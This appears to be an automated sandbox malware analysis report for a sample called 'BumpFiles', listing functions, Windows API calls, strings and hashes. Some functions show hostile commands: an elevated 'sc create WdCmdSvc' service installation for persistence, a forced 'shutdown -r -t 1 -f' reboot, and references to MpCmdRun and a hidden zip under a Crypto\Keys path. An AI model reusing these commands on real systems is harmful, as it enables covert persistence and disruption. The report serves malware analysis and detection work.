Instruction Fuzzy Hash: 39D0A979920E0281DB304720EE8133E30A2E3D2344FE08077C102A9EDAD53C8CC86509

Uniqueness

Uniqueness Score: -1.00%

Function 005E0E10 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 005E0E2C

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
Instruction ID: 18fab1817f0ac2ddc0a628744168dd28ff6dc8f748c4f05e99ad38f9ca4f3eba
Opcode Fuzzy Hash: 864a33c9d5ead3eb2f8eeadc0b8b6ecf4ddac0002db075a5c7f387cc0a82fc8a
Instruction Fuzzy Hash: A7C01270910E409BCB20E734D494AC03B567790312FD06A90E00286055D775A8C44710

Uniqueness

Uniqueness Score: -1.00%

Function 00639740 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 148sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0042547C: DeleteFileW.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042548C
Part of subcall function 0042547C: GetLastError.KERNEL32(00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1), ref: 0042549B
Part of subcall function 0042547C: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254A3
Part of subcall function 0042547C: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0063989C,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 004254BE

Part of subcall function 0042D8FC: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,006398D3,00639966,00000000,0063998E,?,?,00000000,00000000,?), ref: 0042D925

MoveFileW.KERNEL32(00000000,00000000), ref: 00639902
Sleep.KERNEL32(0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C,00000000,00633AEE), ref: 00639909

Part of subcall function 00633BD8: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30

Part of subcall function 0063586C: Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
Part of subcall function 0063586C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
Part of subcall function 0063586C: Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898

Sleep.KERNEL32(0000012C,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000,00000000,?,?,00633AC1,0000012C), ref: 00639956

Strings

web3, xrefs: 006397D1
:c, xrefs: 006397F1, 00639911
bin01.zip, xrefs: 006398EC
appdata, xrefs: 006398C9
web1, xrefs: 006397A5
\Microsoft\Crypto\Keys\bin01.zip, xrefs: 006398D6
MpCmdRun, xrefs: 006397F4
Fairfield Burn, xrefs: 00639779
web2, xrefs: 006397BB
hWe, xrefs: 00639820
.exe, xrefs: 00639914

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep$File$AttributesDeleteDirectoryEnvironmentErrorExecExecuteLastMoveRemoveShellVariable
String ID: .exe$Fairfield Burn$MpCmdRun$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$hWe$web1$web2$web3$:c
API String ID: 482055496-2407289723
Opcode ID: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
Instruction ID: 6a08d19c26d714fab50d671978c63310f8441c2b808e462788730ff630382bdb
Opcode Fuzzy Hash: e37fd13f69adfa98b46b53a9ea0c25744da4257322702164be1620a3d4288908
Instruction Fuzzy Hash: A2511034A002089FCB04EB95D89299EB7B6FF49304F50457AF501BB3A1CA78AD11CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00408724 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00408739
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040873F
GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408752
GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 0040875B
GetLogicalProcessorInformation.KERNEL32(?,?,00000000,004087D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 00408786

Strings

GetLogicalProcessorInformation, xrefs: 0040872F
@, xrefs: 004087D9
kernel32.dll, xrefs: 00408734

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 1184211438-79381301
Opcode ID: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
Instruction ID: 94ed4e08121dfc731aadc6161b9dc92060a75603e21bf53f2b7b765583e3cb19
Opcode Fuzzy Hash: cbf0cd720f7e1b1354e00fae55a999ce3961c8696a2936c52f21f92b8d5bab9f
Instruction Fuzzy Hash: 58116075D00208AEDB10EBA6CE45B6EB7F4EB44304F6084BFE944B76C1DB7C9A408E59

Uniqueness

Uniqueness Score: -1.00%

Function 004358F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0043598D
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004359A9
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 004359E2
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00435A5F
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00435A78
VariantCopy.OLEAUT32(?), ref: 00435AAD

Strings

, xrefs: 0043590E

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-3916222277
Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
Instruction ID: 57dc533516daf27d20718af8ae304f80e1a5e57ae138a1668c92b3d964784860
Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
Instruction Fuzzy Hash: 5751EDB59006299BCB26EB59C881BD9B3FCAF4C314F0051DAF508E7211D6389F858F65

Uniqueness

Uniqueness Score: -1.00%

Function 00409A2C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843,00645860), ref: 00409A65
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C,00651B9C,?,?,00646C38,00410843), ref: 00409A6B
GetStdHandle.KERNEL32(000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?,00651B9C), ref: 00409A86
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,`Xd,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,`Xd,00000000,?,00409AEA,?,?), ref: 00409A8C

Strings

Runtime error at 00000000, xrefs: 00409A5E, 00409AA3
Error, xrefs: 00409A9E
`Xd, xrefs: 00409A57, 00409A72, 00409A5B, 00409A76

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000$`Xd
API String ID: 3320372497-4153497386
Opcode ID: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
Instruction ID: c079a58617cb9f0810b361c2046c62cec813f90908bc8480150aa18e021c2eb6
Opcode Fuzzy Hash: 4d072716b74e4d2d4f0292f5c53dc76595c072d064c7cbb48b596f4c713f257c
Instruction Fuzzy Hash: C6F0C2A478038078EB20BB608C07F1B36299B42B15F50613FB124B90C2C6BC48888AAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
Opcode Fuzzy Hash: cbe1a3ec5a32b9eead7e744cdaf59000594651710259c7be96163e5078e6808d
Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95

Uniqueness

Uniqueness Score: -1.00%

Function 005EDC40 Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 005EDC66
IsWindowUnicode.USER32(00000000), ref: 005EDCA9
SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDCC4
SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 005EDCE3
GetWindowThreadProcessId.USER32(00000000), ref: 005EDCF2
GetWindowThreadProcessId.USER32(?,?), ref: 005EDD03
SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 005EDD23

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: MessageSendWindow$ProcessThread$CaptureUnicode
String ID:
API String ID: 1994056952-0
Opcode ID: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
Instruction ID: be34951a36e43789f3af398a6a51a07d0984e7834307d8855864e108d5b23d24
Opcode Fuzzy Hash: 5ac85de19b6be435bf82f1736d3f4b46a49f2a42355d5bdb40b428549a2b5a6b
Instruction Fuzzy Hash: 64219C75204649AF9624FA5ACE80FAB77ECAF94350B245429B99EC7242DA54FC40C734

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE4 Relevance: 10.9, APIs: 7, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
Instruction ID: effb08d611f5e391307ffa91fb3e4cdf484130bf0c3f56b27be3f07da332bfd1
Opcode Fuzzy Hash: 44b64e838ee6cb7a0d6a9cde7889228720b4fbb73db2ac52fe1f74d9c05f311e
Instruction Fuzzy Hash: 25C133B2710A014BE714AA7D9C8476FB286DBC5325F18823FE215EB3D6DA7CCC558B48

Uniqueness

Uniqueness Score: -1.00%

Function 004089AC Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E38: GetCurrentThreadId.KERNEL32 ref: 00408E3B

GetTickCount.KERNEL32 ref: 004089E3
GetTickCount.KERNEL32 ref: 004089FB
GetCurrentThreadId.KERNEL32 ref: 00408A2A
GetTickCount.KERNEL32 ref: 00408A55
GetTickCount.KERNEL32 ref: 00408A8C
GetTickCount.KERNEL32 ref: 00408AB6
GetCurrentThreadId.KERNEL32 ref: 00408B26

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
Instruction ID: 04830d6e1a5b1c73318a558b7da50ef5df90f6e1ef99aac74cb934d5c1ef7327
Opcode Fuzzy Hash: 0a695a494a57ecca7e2008bc17aa1918a5afab1f205c43e177ea89caa700f676
Instruction Fuzzy Hash: 4C4183706083419ED721AE7CCA8431BBAD1AF90354F14897FE4D8977C1EF7898818B5B

Uniqueness

Uniqueness Score: -1.00%

Function 004C277C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(D*L,00000004,004C0A6C,00000000,004C2852,?,?,004C0A6C,00000001), ref: 004C27F4
GetCurrentThread.KERNEL32 ref: 004C282C
GetCurrentThreadId.KERNEL32 ref: 004C2834

Strings

XhI, xrefs: 004C281B
D*L, xrefs: 004C27DC
j$L, xrefs: 004C2849, 004C27F9, 004C2803

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: CurrentThread$ErrorLast
String ID: D*L$XhI$j$L
API String ID: 4172138867-1428119162
Opcode ID: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
Instruction ID: f9aeef6c056601da72b3f208aefed89395b05af5cb72de4651f15a5c40964890
Opcode Fuzzy Hash: 796238c61eb4e3f8215a0c941b8ba7d00c7f06a22089185035ce97bd197340a7
Instruction Fuzzy Hash: 652144749042516ED301EB718981BAABBE4AF49304F40863FE41497781DBB89804C3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00633BD8 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 39COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30

Strings

runas, xrefs: 00633C29
:c, xrefs: 00633BD8
/C sc create WdCmdSvc binPath= ", xrefs: 00633C01
" start= auto, xrefs: 00633C09
cmd.exe, xrefs: 00633C24

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: ExecuteShell
String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
API String ID: 587946157-4108604376
Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659

Uniqueness

Uniqueness Score: -1.00%

Function 006C1090 Relevance: 9.1, APIs: 6, Instructions: 84timethreadCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 006C1107
GetSystemTimeAsFileTime.KERNEL32(?), ref: 006C113A
GetCurrentProcessId.KERNEL32 ref: 006C1149
GetCurrentThreadId.KERNEL32 ref: 006C1152
GetTickCount.KERNEL32 ref: 006C115B
QueryPerformanceCounter.KERNEL32(00000000), ref: 006C1170

Memory Dump Source

Source File: 00000004.00000002.2609248117.00000000006C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 006C0000, based on PE: true

Associated: 00000004.00000002.2609181191.00000000006C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2609298581.00000000006C3000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c0000_BumpFiles.jbxd

Similarity

API ID: CurrentProcessTime$CountCounterExitFilePerformanceQuerySystemThreadTick
String ID:
API String ID: 496932849-0
Opcode ID: 8dde9fc67be0476f0f512016d4bc64643eb959c105f0524a34fa21c7008fb3a7
Instruction ID: 8b33102803b69e9548956e067b3fa30e3357addca20cc94b08cee6a2e3167358
Opcode Fuzzy Hash: 8dde9fc67be0476f0f512016d4bc64643eb959c105f0524a34fa21c7008fb3a7
Instruction Fuzzy Hash: 11216D71D09294AFEB15CFB4E949EADBFF5EF0A301705988AD501DB222D6349B04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00424F1C Relevance: 9.1, APIs: 6, Instructions: 83fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F71
CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0063344B,00000000), ref: 00424F7C
GetLastError.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424FC3

Memory Dump Source

Source File: 00000004.00000002.2608268480.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2608144456.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608633719.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608665002.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608698172.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608788352.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608862949.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2608945208.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2609017209.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_BumpFiles.jbxd

Similarity

API ID: File$AttributesCloseCreateErrorHandleLast
String ID:
